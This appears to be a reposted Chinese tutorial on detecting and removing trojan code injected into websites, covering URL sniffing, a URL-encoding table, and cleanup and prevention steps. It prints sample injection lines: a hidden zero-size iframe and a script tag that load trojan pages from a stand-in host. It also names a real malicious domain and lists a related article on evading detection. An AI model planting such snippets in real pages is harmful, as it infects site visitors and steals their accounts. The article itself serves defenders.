如何进行网站挂马检测与清除
转自:http://sec.chinabyte.com/206/8919706.shtml
不完全统计,90%的网站都被挂过马,挂马是指在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险超过。目前挂马主要是为了商业利益,有的挂马是为了赚取流量,有的是为了盗取游戏等账号,也有的是为了好玩,不管是处于那种目的,对于访问被挂马的网站来说都是一种潜在的威胁,影响运营网站公司形象。
当一个网站运营很长时间后,网站文件会非常多,手工查看网页文件代码非常困难,杀毒软件仅仅对恶意代码进行查杀,对网页木马以及挂马程序不一定全部查杀,本文就如何利用一些安全检测工具软件来检测和清除网站木马方面进行探讨,使用本文提及的工具可以很轻松的检测网站是否被挂马。
(一)检测挂马页面
1.安装urlsnooper 软件
Urlsnooper是一款URL嗅探工具,其官方主页地址为:http://www.donationcoder.com/urlsnooper,目前已经不提供免费下载了。
2.对网站进行侦测
在Urlsnooper中的“Protocol Filter”中选择“Show All”,然后单击“Sniff Network”按钮开始监听网络。接着使用IE浏览器打开需要进行检测木马的网站,Urlsnooper会自动抓取网站中的所有连接,在Index中按照五位数字序号进行排列,在侦测结果中可能包含的连接地址非常多,这个时候就需要进行排查,可以选中每一个记录,Urlsnooper会在下方中显示详细的监听结果。
3.对地址进行解码
该地址采用了一种编码,我对常用的这种编码值进行了整理,如下表所示,从中可以找出该代码中的真实地址为http://ave1.cn。
表1 编码对应表
|
原值 |
解码前的值 |
原值 |
解码前的值 |
原值 |
解码前的值 |
|
backspace |
%08 |
I |
%49 |
u |
%75 |
|
tab |
%09 |
J |
%4A |
v |
%76 |
|
linefeed |
%0A |
K |
%4B |
w |
%77 |
|
creturn |
%0D |
L |
%4C |
x |
%78 |
|
space |
%20 |
M |
%4D |
y |
%79 |
|
! |
%21 |
N |
%4E |
z |
%7A |
|
" |
%22 |
O |
%4F |
{ |
%7B |
|
# |
%23 |
P |
%50 |
| |
%7C |
|
$ |
%24 |
Q |
%51 |
} |
%7D |
|
% |
%25 |
R |
%52 |
||
|
& |
%26 |
S |
%53 |
||
|
' |
%27 |
T |
%54 |
||
|
( |
%28 |
U |
%55 |
||
|
) |
%29 |
V |
%56 |
||
|
* |
%2A |
W |
%57 |
||
|
+ |
%2B |
X |
%58 |
||
|
, |
%2C |
Y |
%59 |
||
|
- |
%2D |
Z |
%5A |
||
|
. |
%2E |
[ |
%5B |
||
|
/ |
%2F |
\ |
%5C |
||
|
0 |
%30 |
] |
%5D |
||
|
1 |
%31 |
^ |
%5E |
||
|
2 |
%32 |
_ |
%5F |
||
|
3 |
%33 |
` |
%60 |
||
|
4 |
%34 |
a |
%61 |
||
|
5 |
%35 |
b |
%62 |
||
|
6 |
%36 |
c |
%63 |
||
|
7 |
%37 |
d |
%64 |
||
|
8 |
%38 |
e |
%65 |
||
|
9 |
%39 |
f |
%66 |
||
|
: |
%3A |
g |
%67 |
||
|
; |
%3B |
h |
%68 |
||
|
< |
%3C |
i |
%69 |
||
|
= |
%3D |
j |
%6A |
||
|
> |
%3E |
k |
%6B |
||
|
? |
%3F |
l |
%6C |
||
|
@ |
%40 |
m |
%6D |
||
|
A |
%41 |
n |
%6E |
||
|
B |
%42 |
o |
%6F |
||
|
C |
%43 |
p |
%70 |
||
|
D |
%44 |
q |
%71 |
||
|
E |
%45 |
r |
%72 |
||
|
F |
%46 |
s |
%73 |
||
|
G |
%47 |
t |
%74 |
||
|
H |
%48 |
u |
%75 |
4.获取该网站相关内容
可以使用Flashget的资源管理器去获取该网站的内容,如图4所示,打开Flashget下载工具,单击“工具”-“站点资源探索器”,打开站点资源探索器,在地址中输入“http://ave1.cn”,然后回车即可获取该网站的一些资源,在站点资源探索器中可以直接下载看见的文件,下载到本地进行查看。
说明:
使用“Flashget站点资源探索器”可以很方便的获取挂马者代码地址中的一些资源,这些资源可能是挂马的真实代码,透过这些代码可以知道挂马者是采用哪个漏洞,有时候还可以获取0day。
5.常见的挂马代码
(1)框架嵌入式网络挂马
网页木马被攻击者利用iframe语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术。通常的挂马代码如下:
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>
解释:在打开插入该句代码的网页后,就也就打开了http://www.xxx.com/muma.html页面,但是由于它的长和宽都为“0”,所以很难察觉,非常具有隐蔽性。
(2)Js调用型网页挂马
js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,如:黑客先制作一个.js文件,然后利用js代码调用到挂马的网页。通常代码如下:
<script language=javascript src=http://www.xxx.com/gm.js></script>
http://www.xxx.com/gm.js就是一个js脚本文件,通过它调用和执行木马的服务端。这些js文件一般都可以通过工具生成,攻击者只需输入相关的选项就可以了。
(3)图片伪装挂马
随着防毒技术的发展,黑手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击者将类似: http://www.xxx.com/test.htm中的木马代码植入到test.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只需输入相关的选项就可以了。图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:
注:当用户打开http://www.xxx.com/test.htm是,显示给用户的是http://www.xxx.com/test.jpg,而http://www.xxx.com/test.htm网页代码也随之运行。
(4)网络钓鱼挂马(也称为伪装调用挂马)
网络中最常见的欺骗手段,黑客们利用人们的猎奇、贪心等心理伪装构造一个链接或者一个网页,利用社会工程学欺骗方法,引诱点击,当用户打开一个看似正常的页面时,网页代码随之运行,隐蔽性极高。这种方式往往和欺骗用户输入某些个人隐私信息,然后窃取个人隐私相关联。比如攻击者模仿腾讯公司设计了一个获取QQ币的页面,引诱输入QQ好和密码,如图5所示。等用户输入完提交后,就把这些信息发送到攻击者指定的地方,如图6。
图5 伪装QQ页面
图6 获取的QQ密码
(5)伪装挂马
高级欺骗,黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术,当用户访问木马页面时地址栏显示www.sina.com或者security.ctocio.com.cn等用户信任地址,其实却打开了被挂马的页面,从而实现欺骗,示例代码如:
(二)清除网站中的恶意代码(挂马代码)
1.确定挂马文件
清除网站恶意代码首先需要知道哪些文件被挂马了,判断方法有三个,方法一就是通过直接查看代码,从中找出挂马代码;方法二是通过查看网站目录修改时间,通过时间进行判断;方法三使用本文提到的软件进行直接定位,通过监听找出恶意代码。
2.清除恶意代码
可以使用记事本打开代码文件从中清除恶意代码,在清除代码时一定要注意不要使用FrontPage的预览或者设计,否则会直接访问挂马网站,感染木马程序。建议使用记事本等文本编辑器。在清除恶意代码过程中,发现挂马者竟然对js文件也不放过
恢复措施:
1.整站被挂马,最快速的恢复方法是,除开数据库、上传目录之外,替换掉其他所有文件;
2.仔细检查网站上传目录存放的文件,很多木马伪装成图片保存在上传目录,你直接把上传文件夹下载到本地,用缩略图的形式,查看是不是图片,如果不显示,则一律删除;
3.数据库里面存在木马,则把数据库的木马代码清除!可以采用查找替换;
4.如果网站源文件没有,则需要FTP下载网站文件,然后再DW里面,用替换清除的方式一个个清除,注意网站的木马数,如果被挂了很多不同的,必须多多检查!
预防措施 :
1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。
2、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。
这其中包括各种新闻发布、 商城 及论坛程序,只要可以上传文件的asp都要进行身份认证!
3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。
4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。
5、要尽量保持程序是最新版本。
6、不要在网页上加注后台管理程序登陆页面的链接。
7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。
8、要时常备份数据库等重要文件。
9、日常要多维护,并注意空间中是否有来历不明的asp文件。记住:一分汗水,换一分安全!
10、一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件。
11、定期对网站进行安全的检测,具体可以利用网上一些工具,如亿思网站安全检测平台。
如何进行网站挂马检测与清除相关推荐
- 在线安全,在线杀毒,在线可疑文件分析,在线挂马检测
一.病毒可疑文件分析 http://www.virscan.org/ http://www.virustotal.com/zh-cn/ 二.网站挂马检测 http://union.rising.com ...
- 网马的反挂马检测及精确投放(免杀)
前天shadow在群里提到或许可以采取一些方法来实现对挂马检测系统的绕过,遂与其深入探讨了下,事后又考虑到网马的精确投放,总结了一些点做了点儿技术实现 ,并在这里简单记录下想到的一些想法,欢迎其他大牛 ...
- BT天堂网站挂马事件后续:“大灰狼”远控木马分析及幕后真凶调查
9月初安全团队披露bt天堂网站挂马事件,该网站被利用IE神洞CVE-2014-6332挂马,如果用户没有打补丁或开启安全软件防护,电脑会自动下载执行大灰狼远控木马程序. 鉴于bt天堂电影下载网站访问量 ...
- 某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg endurer 原创 2008-02-29 第1版 1.网站首页包含代码: /--- <iframe src= ...
- qqsafe病毒 arp网站挂马 原理剖析-786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org(转载)
昨天小站被挂马了,每次打开都会自动弹出一个对话框,提示正准备安装...,然后就消失.查看页面的源文件会发现在代码的最后面被加上了9 ~0 ]* U9 N2 ^ <body>" z ...
- 金山安全报告:二月漏洞频出 网站挂马猖獗
赚足眼球的"猫癣" 一款早在春节之前就已经发出预警的病毒,在大假结束后还是席卷了国内网络,无论称呼"猫癣"还是"犇牛",被电脑用户们牢牢记住 ...
- 检测网站挂马程序(Python)
系统管理员通常从svn/git中检索代码,部署站点后通常首先会生成该站点所有文件的MD5值,如果上线后网站页面内容被篡改(如挂马)等,可以比对之前生成MD5值快速查找去那些文件被更改,为了使系统管理员 ...
- 网站挂马危害及其防御措施
网页挂马是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码.浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机.通俗点说就是将网页木马这样的攻击 ...
- 《越狱》完结 米帅迷应小心纹身网站挂马
据瑞星"云安全"系统监测,5月18日是世界博物馆日,"中国书画苑"."今日艺术网"."中国艺术品在线"等网站被黑客挂马, ...
- 各种网站挂马的代码和原理
只要不破坏原有的语言逻辑,那就想插入哪里就写哪里了,最基本的语句当然是<iframe src=http://www.fucksb.net/mm.htm width=0 height=0>& ...
最新文章
- 距离传感器控制灯泡代码_如何使用颜色传感器和超声波传感器检测障碍物和避障...
- R语言dataframe创建新的特征(变量)、行加和特征、行均值特征(基于加减乘除、指数、模数等操作符)、创建新的特征(变量)、生成编码特征(基于比较操作符、逻辑操作符)
- 《部署IPv6网络(修订版)》一2.4 邻居发现协议
- android Button 监听的几种方式
- windows7使用vhd虚拟磁盘
- Effective Java之将局部变量的作用域最小化(四十五)
- HDOJ 杭电1874-畅通工程(Floyd算法)
- git 解决冲突(6)
- k均值算法原理及matlab实现
- 【转】AB实验设计思路及实验落地 ABtest不平衡
- hexo+yilia添加背景音乐
- 【CSP-S2019模拟】09.25比赛总结
- Python 时间序列异常点检测 | 详解 S-ESD 和 S-H-ESD
- .scss和.css的区别,css - SCSS和Sass有什么区别?
- 2022.05面试总结
- web实战-京东网(仅学习)
- 【量化交易】94篇论文分析股市预测的深度学习技术
- c语言十进制转换成k进制,C语言10进制转换为k进制的问题
- PostgreSQL数据库系列之六:增量备份和恢复
- apache字体文件跨域_CDN中,字体文件的跨域问题和解决